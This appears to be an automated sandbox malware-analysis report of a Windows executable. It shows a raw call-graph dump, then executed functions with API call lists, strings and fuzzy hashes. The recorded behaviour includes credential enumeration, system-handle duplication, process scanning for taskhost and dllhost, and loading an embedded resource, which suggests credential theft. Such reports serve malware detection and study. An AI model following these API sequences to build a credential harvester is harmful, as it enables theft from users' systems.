40202->40262 40204->40202 40260 444283 13 API calls 40204->40260 40206 437dfc 40261 437ccb 11 API calls 40206->40261 40209 41f54d 40208->40209 40215 41f44f 40208->40215 40210 41f466 40209->40210 40293 41c635 memset memset 40209->40293 40210->40176 40210->40178 40215->40210 40217 41f50b 40215->40217 40264 41f1a5 40215->40264 40289 41c06f memcmp 40215->40289 40290 41f3b1 90 API calls 40215->40290 40291 41f398 86 API calls 40215->40291 40217->40209 40217->40210 40292 41c295 86 API calls 40217->40292 40294 41703f 40219->40294 40221 437399 40222 43739d 40221->40222 40224 4373ac 40221->40224 40301 4446ea 11 API calls 40222->40301 40225 416935 16 API calls 40224->40225 40226 4373ca 40225->40226 40227 438460 134 API calls 40226->40227 40232 4251c4 137 API calls 40226->40232 40236 415a91 memset 40226->40236 40239 43758f 40226->40239 40251 437584 40226->40251 40254 437d3c 135 API calls 40226->40254 40302 425433 13 API calls 40226->40302 40303 425413 17 API calls 40226->40303 40304 42533e 16 API calls 40226->40304 40305 42538f 16 API calls 40226->40305 40306 42453e 123 API calls 40226->40306 40227->40226 40228 4375bc 40230 415c7d 16 API calls 40228->40230 40231 4375d2 40230->40231 40233 4442e6 11 API calls 40231->40233 40253 4373a7 40231->40253 40232->40226 40234 4375e2 40233->40234 40234->40253 40309 444283 13 API calls 40234->40309 40236->40226 40307 42453e 123 API calls 40239->40307 40242 4375f4 40245 437620 40242->40245 40246 43760b 40242->40246 40244 43759f 40247 416935 16 API calls 40244->40247 40249 416935 16 API calls 40245->40249 40310 444283 13 API calls 40246->40310 40247->40251 40249->40253 40251->40228 40308 42453e 123 API calls 40251->40308 40252 437612 memcpy 40252->40253 40253->40188 40254->40226 40255->40172 40256->40192 40257->40189 40258->40172 40259->40196 40260->40206 40261->40202 40262->40196 40263->40196 40265 41bc3b 101 API calls 40264->40265 40266 41f1b4 40265->40266 40267 41edad 86 API calls 40266->40267 40274 41f282 40266->40274 40268 41f1cb 40267->40268 40269 41f1f5 memcmp 40268->40269 40270 41f20e 40268->40270 40268->40274 40269->40270 40271 41f21b memcmp 40270->40271 40270->40274 40272 41f326 40271->40272 40275 41f23d 40271->40275 40273 41ee6b 86 API calls 40272->40273 40272->40274 40273->40274 40274->40215 40275->40272 40276 41f28e memcmp 40275->40276 40278 41c8df 56 API calls 40275->40278 40276->40272 40277 41f2a9 40276->40277 40277->40272 40280 41f308 40277->40280 40281 41f2d8 40277->40281 40279 41f269 40278->40279 40279->40272 40282 41f287 40279->40282 40283 41f27a 40279->40283 40280->40272 40287 4446ce 11 API calls 40280->40287 40284 41ee6b 86 API calls 40281->40284 40282->40276 40285 41ee6b 86 API calls 40283->40285 40286 41f2e0 40284->40286 40285->40274 40288 41b1ca memset 40286->40288 40287->40272 40288->40274 40289->40215 40290->40215 40291->40215 40292->40209 40293->40210 40295 417044 40294->40295 40296 41705c 40294->40296 40298 416760 11 API calls 40295->40298 40300 417055 40295->40300 40297 417075 40296->40297 40299 41707a 11 API calls 40296->40299 40297->40221 40298->40300 40299->40295 40300->40221 40301->40253 40302->40226 40303->40226 40304->40226 40305->40226 40306->40226 40307->40244 40308->40228 40309->40242 40310->40252 40312 42b4ff 40311->40312 40313 415a91 memset 40312->40313 40314 42b52c 40313->40314 40315 42b553 memcpy 40314->40315 40316 42b545 40314->40316 40315->40316 40316->40140 40317->40142 40318->40143 40324 415cfe 40319->40324 40329 415d23 __aullrem __aulldvrm 40324->40329 40331 41628e 40324->40331 40325 4163ca 40338 416422 11 API calls 40325->40338 40327 416172 memset 40327->40329 40328 416422 10 API calls 40328->40329 40329->40325 40329->40327 40329->40328 40330 415cb9 10 API calls 40329->40330 40329->40331 40330->40329 40332 416520 40331->40332 40333 416527 40332->40333 40337 416574 40332->40337 40335 416544 40333->40335 40333->40337 40339 4156aa 11 API calls 40333->40339 40336 416561 memcpy 40335->40336 40335->40337 40336->40337 40337->40119 40338->40331 40339->40335 40361 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37682 425711 37673->37682 37687 425ad6 37674->37687 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37682->37674 37684 4259da 37682->37684 37690 422aeb memset memcpy memcpy 37682->37690 37691 429a4d 37682->37691 37694 4260a1 37682->37694 37705 4259c2 37682->37705 37708 425a38 37682->37708 37725 4227f0 memset memcpy 37682->37725 37726 422b84 15 API calls 37682->37726 37727 422b5d memset memcpy memcpy 37682->37727 37728 422640 13 API calls 37682->37728 37730 4241fc 11 API calls 37682->37730 37731 42413a 90 API calls 37682->37731 37735 416760 11 API calls 37684->37735 37690->37682 37692 429a66 37691->37692 37696 429a9b 37691->37696 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37694->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37700 429a7a 37739 416760 11 API calls 37700->37739 37705->37687 37729 415c56 11 API calls 37705->37729 37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37682 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37682 37726->37682 37727->37682 37728->37682 37729->37684 37730->37682 37731->37682 37732->37708 37733->37708 37734->37684 37735->37681 37736->37687 37737->37682 37738->37700 37739->37697 37740->37697 37741->37674 37742->37684 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37762 41ee3c 37762->37744 37765 41ee58 37765->37762 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37762 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37830 41bf99 86 API calls 37774->37830 37775->37762 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37785 41be8c 37778->37785 37809 418c63 memset memset 37778->37809 37808 4446ce 11 API calls 37779->37808 37782 41be69 37782->37762 37782->37772 37783 41bee7 37783->37782 37813 41a453 86 API calls 37783->37813 37785->37782 37785->37783 37786 41bf3a 37785->37786 37789 41bed1 37785->37789 37812 4446ce 11 API calls 37786->37812 37788 41bef0 37788->37783 37791 41bf01 37788->37791 37789->37788 37792 41bee2 37789->37792 37790 41bf24 memset 37790->37782 37791->37790 37793 41bf14 37791->37793 37810 418a6d memset memcpy memset 37791->37810 37798 41ac13 37792->37798 37811 41a223 memset memcpy memset 37793->37811 37797 41bf20 37797->37790 37799 41ac52 37798->37799 37800 41ac3f memset 37798->37800 37803 41ac6a 37799->37803 37814 41dc14 19 API calls 37799->37814 37801 41acd9 37800->37801 37801->37783 37805 41aca1 37803->37805 37815 41519d 37803->37815 37805->37801 37806 41acc0 memset 37805->37806 37807 41accd memcpy 37805->37807 37806->37801 37807->37801 37808->37782 37809->37785 37810->37793 37811->37797 37812->37783 37814->37803 37818 4175ed 37815->37818 37826 417570 SetFilePointer 37818->37826 37821 41760a ReadFile 37822 417637 37821->37822 37823 417627 GetLastError 37821->37823 37824 4151b3 37822->37824 37825 41763e memset 37822->37825 37823->37824 37824->37805 37825->37824 37827 4175b2 37826->37827 37828 41759c GetLastError 37826->37828 37827->37821 37827->37824 37828->37827 37829 4175a8 GetLastError 37828->37829 37829->37827 37830->37775 37831 417bc5 37833 417c61 37831->37833 37837 417bda 37831->37837 37832 417bf6 UnmapViewOfFile CloseHandle 37832->37832 37832->37837 37835 417c2c 37835->37837 37843 41851e 20 API calls 37835->37843 37837->37832 37837->37833 37837->37835 37838 4175b7 37837->37838 37839 4175d6 FindCloseChangeNotification 37838->37839 37840 4175c8 37839->37840 37841 4175df 37839->37841 37840->37841 37842 4175ce Sleep 37840->37842 37841->37837 37842->37839 37843->37835 39799 4147f3 39802 414561 39799->39802 39801 414813 39803 41456d 39802->39803 39804 41457f GetPrivateProfileIntW 39802->39804 39807 4143f1 memset _itow WritePrivateProfileStringW 39803->39807 39804->39801 39806 41457a 39806->39801 39807->39806

                                                                                                                Executed Functions

                                                                                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                • API String ID: 594330280-3398334509
                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413D4C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$??3@CloseProcessProcess32memset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 3405910027-1740548384
                                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                • String ID: BIN
                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2947809556-0
                                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 1690352074-0
                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystemmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3558857096-0
                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
